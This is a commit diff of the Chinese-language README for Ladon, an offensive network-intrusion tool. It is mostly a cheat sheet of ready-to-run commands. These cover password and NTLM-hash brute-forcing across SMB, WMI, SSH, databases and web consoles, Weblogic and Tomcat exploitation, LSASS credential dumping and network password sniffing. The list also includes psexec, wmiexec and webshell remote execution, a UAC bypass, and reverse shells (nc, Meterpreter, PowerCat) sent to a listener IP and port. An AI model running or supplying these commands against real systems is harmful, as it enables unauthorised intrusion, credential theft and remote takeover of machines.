Update README.md

k8gege · Jul 1, 2020 · 94bec8e · 94bec8e
1 parent e4ff968
commit 94bec8e
Showing 1 changed file with 316 additions and 71 deletions.
diff --git a/README.md b/README.md
@@ -44,74 +44,319 @@ All Version: https://github.com/k8gege/Ladon/releases/
 
 ### 0.Cobalt Strike联动
 ![](https://github.com/k8gege/K8CScan/blob/master/Images/CobaltStrike.gif)
-### 1.SmbScan MS17-010漏洞扫描
-IP、SMB漏洞、机器名、操作系统版本<br>
-![SmbScan](https://github.com/k8gege/K8CScan/blob/master/Images/MS17010.PNG)
-### 2.OSscan 操作系统探测
-通过SMB、多端口、Banner等方式探测（存活主机、主机名、域名、操作系统版本、开放服务等）<br>
-![OSscan](https://github.com/k8gege/K8CScan/blob/master/Images/OSscan.PNG)
-### 3.OnlinePC 存活主机扫描
-也支持检测主机名/域名是否存活,结果IP、Mac、机器名<br>
-![OnlinePC](https://github.com/k8gege/K8CScan/blob/master/Images/OnlinePC.PNG)
-### 4.WebScan Web扫描
-内网站点扫描，获取服务器Banner、网页标题<br>
-![WebScan](https://github.com/k8gege/K8CScan/blob/master/Images/WebScan.PNG)
-### 5.FtpScan FTP密码扫描
-需上传user.txt和pass.txt至beacon工作目录<br>
-![FtpScan](https://github.com/k8gege/K8CScan/blob/master/Images/FtpScan.PNG)
-### 6.WmiScan Win方式爆破Windows密码（IPC被拒绝时可尝试WMI）
-Wmi方式批量爆破内网主机帐密,需上传user.txt和pass.txt至工作目录<br>
-![WmiScan](https://github.com/k8gege/K8CScan/blob/master/Images/WmiScan.PNG)
-### 7.CiscoScan 思科设备扫描
-(IP、设备型号、主机名、Boot、硬件版本)<br>
-![CiscoScan](https://github.com/k8gege/K8CScan/blob/master/Images/CiscoScan.PNG)
-### 8.UrlScan C段域名URL扫描
-通过源码获取域名或URL，但不验证IP,适用于内网扫描时，目标域名指向外网IP<br>
-或者通过域名判断内网站点是何产品，比如出现cisco.com域名，说明此为cisco设备<br>
-![UrlScan](https://github.com/k8gege/K8CScan/blob/master/Images/UrlScan.PNG)
-### 9.SameWeb C段旁站扫描
-通过源码获取域名并验证IP，返回正确的同服站点,非bing或爱站等方式,即内网不可上网也可扫描<br>
-验证IP主要适用于，外网扫描时旁站，因为获取的域名指向外网时，无法通过IP判断是否属于同服<br>
-![SameWeb](https://github.com/k8gege/K8CScan/blob/master/Images/SameWeb.PNG)
-### 10.WeblogicExp & WeblogicPoc
-Weblogic漏洞扫描两个模块,一个是只扫描是否存在漏洞，另一个是扫描并且GetShell<br>
-![WeblogicExp](https://github.com/k8gege/K8CScan/blob/master/Images/WeblogicExp.PNG)
-### 11.EnumMSSQL 枚举局域网MS SQL SERVER数据库主机
-和PowerUpSql一样不一定能获取到SQL版本
-![](https://github.com/k8gege/K8CScan/blob/master/Images/EnumMSSQL.PNG)
-### 12.EnumShare 枚举局域网共享资源
-![](https://github.com/k8gege/K8CScan/blob/master/Images/EnumShare.PNG)
-### 13.MssqlScan MSSQL数据库密码爆破
-![](https://github.com/k8gege/K8CScan/blob/master/Images/MssqlScan.PNG)
-### 14.MysqlScan MySQL数据库密码爆破
-![](https://github.com/k8gege/K8CScan/blob/master/Images/MysqlScan.PNG)
-### 15.SSHscan SSH主机密码爆破
-![](https://github.com/k8gege/K8CScan/blob/master/Images/SSHscan.PNG)
-### 16.OracleScan Oracle数据库密码爆破
-![](https://github.com/k8gege/K8CScan/blob/master/Images/OracleScan.PNG)
-### 17.HostIP 域名解析/主机名转IP
-![](https://github.com/k8gege/K8CScan/blob/master/Images/HostIP.PNG)
-### 18.WhatCMS 指纹识别支持62种CMS
-url.txt指定站点或批量站点扫描,也可扫描整个C段部分web端口对应CMS
-![](https://github.com/k8gege/K8CScan/blob/master/Images/WhatCMS.png)
-### 19.IpcScan Windows密码爆破(Wmi被拒绝时可尝试Ipc)
-![](https://github.com/k8gege/K8CScan/blob/master/Images/IpcScan.PNG)
-### 20.WebScan2 Web信息扫描含CMS识别
-url.txt指定站点或批量站点扫描,也可扫描整个C段中Web信息
-![](https://github.com/k8gege/K8CScan/blob/master/Images/WebScan2.PNG)
-### 21.EnBase64/DeBase64  Base64密码批量加密解密
-![](https://github.com/k8gege/K8CScan/blob/master/Images/Base64.PNG)
-### 22.EnHex/DeHex  Hex密码批量加密解密(3种格式)
-![](https://github.com/k8gege/K8CScan/blob/master/Images/DeHex.PNG)
-### 23.SmbScan Windows密码爆破(Wmi被拒绝时可尝试,记录错误日志)
-![](https://github.com/k8gege/K8CScan/blob/master/Images/SmbScan.png)
-### 24.PhpStudyPoc PhpStudy后门检测
-![](https://github.com/k8gege/K8CScan/blob/master/Images/PhpStudyPoc.PNG)
-### 25.DomainIP 域名解析
-![](https://github.com/k8gege/K8CScan/blob/master/Images/DomainIP.gif)
-### 26.SubDomain 子域名爆破
-需域名字典SubDomain.dic<br>
-例子: Cscan baidu.com SubDomain<br>
-![](https://github.com/k8gege/K8CScan/blob/master/Images/SubDomain.gif)
-### 27.WebDir Web目录扫描
-![](https://github.com/k8gege/K8CScan/blob/master/Images/WebDir.PNG)
+
+
+### 前言
+
+本文仅是Ladon简单使用例子，Cobalt Strike或PowerShell版用法一致。
+
+完整文档：http://k8gege.org/Ladon
+
+### 资产扫描、指纹识别、服务识别、存活主机、端口扫描
+
+##### 001 多协议探测存活主机 （IP、机器名、MAC地址、制造商）
+Ladon 192.168.1.8/24 OnlinePC
+
+##### 002 多协议识别操作系统 （IP、机器名、操作系统版本、开放服务）
+Ladon 192.168.1.8/24 OsScan
+
+##### 003 扫描存活主机
+Ladon 192.168.1.8/24 OnlineIP
+
+##### 004 ICMP扫描存活主机
+Ladon 192.168.1.8/24 Ping
+
+##### 005 扫描SMB漏洞MS17010 （IP、机器名、漏洞编号、操作系统版本）
+Ladon 192.168.1.8/24 MS17010
+
+##### 006 SMBGhost漏洞检测 CVE-2020-0796 （IP、机器名、漏洞编号、操作系统版本）
+Ladon 192.168.1.8/24 SMBGhost
+
+##### 007 扫描Web信息/Http服务
+Ladon 192.168.1.8/24 WebScan
+
+##### 008 扫描C段站点URL域名
+Ladon 192.168.1.8/24 UrlScan
+
+##### 009 扫描C段站点URL域名
+Ladon 192.168.1.8/24 SameWeb
+
+##### 010 扫描子域名、二级域名
+Ladon baidu.com SubDomain
+
+##### 011 域名解析IP、主机名解析IP
+Ladon baidu.com DomainIP
+Ladon baidu.com HostIP
+
+##### 012 域内机器信息获取
+Ladon AdiDnsDump 192.168.1.8 （Domain IP）
+
+##### 013 扫描C段端口、指定端口扫描
+Ladon 192.168.1.8/24 PortScan
+Ladon 192.168.1.8 PortScan 80,445,3389
+
+##### 014 扫描C段WEB以及CMS（75种Web指纹识别）
+Ladon 192.168.1.8/24 WhatCMS
+
+##### 015 扫描思科设备
+Ladon 192.168.1.8/24 CiscoScan
+Ladon http://192.168.1.8 CiscoScan
+
+##### 016 枚举Mssql数据库主机 （数据库IP、机器名、SQL版本）
+Ladon EnumMssql
+
+##### 017 枚举网络共享资源 	（域、存活IP、共享路径）
+Ladon EnumShare
+
+##### 018 扫描LDAP服务器
+Ladon 192.168.1.8/24 LdapScan
+
+##### 019 扫描FTP服务器
+Ladon 192.168.1.8/24 FtpScan
+
+### 暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆
+
+密码爆破详解参考SSH：http://k8gege.org/Ladon/sshscan.html
+
+##### 020 445端口 SMB密码爆破(Windows)
+Ladon 192.168.1.8/24 SmbScan
+
+##### 021 135端口 Wmi密码爆破(Windowns)
+Ladon 192.168.1.8/24 WmiScan
+
+##### 022 389端口 LDAP服务器、AD域密码爆破(Windows)
+Ladon 192.168.1.8/24 LdapScan
+
+##### 023 5985端口 Winrm密码爆破(Windowns)
+Ladon 192.168.1.8/24 WinrmScan.ini
+
+##### 024 445端口 SMB NTLM HASH爆破(Windows)
+Ladon 192.168.1.8/24 SmbHashScan
+
+##### 025 135端口 Wmi NTLM HASH爆破(Windows)
+Ladon 192.168.1.8/24 WmiHashScan
+
+##### 026 22端口 SSH密码爆破(Linux)
+Ladon 192.168.1.8/24 SshScan
+Ladon 192.168.1.8:22 SshScan
+
+##### 027 1433端口 Mssql数据库密码爆破
+Ladon 192.168.1.8/24 MssqlScan
+
+##### 028 1521端口 Oracle数据库密码爆破
+Ladon 192.168.1.8/24 OracleScan
+
+##### 029 3306端口 Mysql数据库密码爆破
+Ladon 192.168.1.8/24 MysqlScan
+
+##### 030 7001端口 Weblogic后台密码爆破
+Ladon http://192.168.1.8:7001/console WeblogicScan
+Ladon 192.168.1.8/24 WeblogicScan
+
+##### 031 5900端口 VNC远程桌面密码爆破
+Ladon 192.168.1.8/24 VncScan
+
+##### 032 21端口 Ftp服务器密码爆破
+Ladon 192.168.1.8/24 FtpScan
+
+##### 033 8080端口 Tomcat后台登陆密码爆破
+Ladon 192.168.1.8/24 TomcatScan
+Ladon http://192.168.1.8:8080/manage TomcatScan
+
+##### 034 Web端口 401基础认证密码爆破
+Ladon http://192.168.1.8/login HttpBasicScan
+
+##### 035 445端口 Impacket SMB密码爆破(Windowns)
+Ladon 192.168.1.8/24 SmbScan.ini
+
+##### 036 445端口 IPC密码爆破(Windowns)
+Ladon 192.168.1.8/24 IpcScan.ini
+
+
+
+### 漏洞检测/漏洞利用/Poc/Exp
+
+##### 037 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144)
+Ladon 192.168.1.8/24 MS17010
+
+##### 038 Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)
+Ladon 192.168.1.8/24 WeblogicPoc
+
+##### 039 PhpStudy后门检测(phpstudy 2016/phpstudy 2018)
+Ladon 192.168.1.8/24 PhpStudyPoc
+
+##### 040 ActiveMQ漏洞检测(CVE-2016-3088)
+Ladon 192.168.1.8/24 ActivemqPoc
+
+##### 041 Tomcat漏洞检测(CVE-2017-12615)
+Ladon 192.168.1.8/24 TomcatPoc
+
+##### 042 Weblogic漏洞利用(CVE-2019-2725)
+Ladon 192.168.1.8/24 WeblogicExp
+
+##### 043 Tomcat漏洞利用(CVE-2017-12615)
+Ladon 192.168.1.8/24 TomcatExp
+
+##### 044 Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)
+Ladon 192.168.1.8/24 Struts2Poc
+
+
+
+### FTP下载、HTTP下载
+
+##### 045 HTTP下载
+Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
+
+##### 046 Ftp下载 	
+Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe
+
+### 加密解密(HEX/Base64)
+
+##### 047 Hex加密解密
+
+Ladon 123456 EnHex
+Ladon 313233343536 DeHex
+
+##### 048 Base64加密解密
+
+Ladon 123456 EnBase64
+Ladon MTIzNDU2 DeBase64
+
+### 网络嗅探
+
+##### 049 Ftp密码嗅探 	
+Ladon FtpSniffer 192.168.1.5
+
+##### 050 HTTP密码嗅探 	
+Ladon HTTPSniffer 192.168.1.5
+
+##### 051 网络嗅探	
+Ladon Sniffer
+
+### 密码读取
+
+##### 052 读取IIS站点密码、网站路径
+Ladon IISpwd
+
+##### DumpLsass内存密码 	
+Ladon DumpLsass
+
+### 信息收集
+
+##### 053 进程详细信息 	
+Ladon EnumProcess
+Ladon Tasklist
+
+##### 054 获取命令行参数 	
+Ladon cmdline
+Ladon cmdline cmd.exe
+
+##### 055 获取渗透基础信息 	
+Ladon GetInfo
+Ladon GetInfo2
+
+##### 056 .NET & PowerShell版本 	
+Ladon NetVer
+Ladon PSver
+Ladon NetVersion
+Ladon PSversion
+
+##### 057 运行时版本&编译环境 	
+Ladon Ver
+Ladon Version
+
+### 远程执行(psexec/wmiexec/atexec/sshexec)
+
+##### 445端口 PSEXEC远程执行命令（交互式）
+
+net user \\192.168.1.8 k8gege520 /user:k8gege
+Ladon psexec 192.168.1.8
+psexec> whoami
+nt authority\system
+
+##### 058 135端口 WmiExec远程执行命令 （非交互式）
+Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami
+
+##### 059 445端口 AtExec远程执行命令（非交互式）
+Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami
+
+##### 060 22端口 SshExec远程执行命令（非交互式）
+Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
+Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
+
+##### 061 JspShell远程执行命令（非交互式）
+Usage：Ladon JspShell type url pwd cmd
+Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
+
+#### 062 WebShell远程执行命令（非交互式）
+```Bash
+Usage：Ladon WebShell ScriptType ShellType url pwd cmd
+Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
+Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
+Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami
+```
+
+### 提权降权
+
+##### 063 BypassUac 绕过UAC执行,支持Win7-Win10 	
+Ladon BypassUac c:\1.exe
+Ladon BypassUac c:\1.bat
+
+##### 064 GetSystem 提权或降权运行程序 	
+Ladon GetSystem cmd.exe
+Ladon GetSystem cmd.exe explorer
+
+##### 065 Runas 模拟用户执行命令 	
+Ladon Runas user pass cmd
+
+### 其它功能
+
+##### 066 一键启用.net 3.5	
+Ladon EnableDotNet
+
+##### 067 获取内网站点HTML源码 	
+Ladon gethtml http://192.168.1.1
+
+##### 068 检测后门
+Ladon CheckDoor
+Ladon AutoRun
+
+##### 069 获取本机内网IP与外网IP 	
+Ladon GetIP
+
+##### 070 一键迷你WEB服务器 	
+Ladon WebSer 80
+Ladon web 80
+
+### 反弹Shell
+
+##### 071 反弹TCP NC Shell
+Ladon ReverseTcp 192.168.1.8 4444 nc
+
+##### 072 反弹TCP MSF Shell
+Ladon ReverseTcp 192.168.1.8 4444 shell
+
+##### 073 反弹TCP MSF MET Shell
+Ladon ReverseTcp 192.168.1.8 4444 meter
+
+##### 074 反弹HTTP MSF MET Shell
+Ladon ReverseHttp 192.168.1.8 4444
+
+##### 075 反弹HTTPS MSF MET Shell
+Ladon ReverseHttps 192.168.1.8 4444
+
+##### 076 反弹TCP CMD & PowerShell Shell
+Ladon PowerCat -r 192.168.1.8 4444 cmd
+Ladon PowerCat -r 192.168.1.8 4444 psh
+
+##### 077 反弹UDP Cmd & PowerShell Shell
+Ladon PowerCat -r 192.168.1.110 4444 cmd -u
+Ladon PowerCat -r 192.168.1.8 4444 psh -u
+
+### 工具下载
+
+最新版本：https://k8gege.org/Download
+历史版本: https://github.com/k8gege/Ladon/releases
+
+
+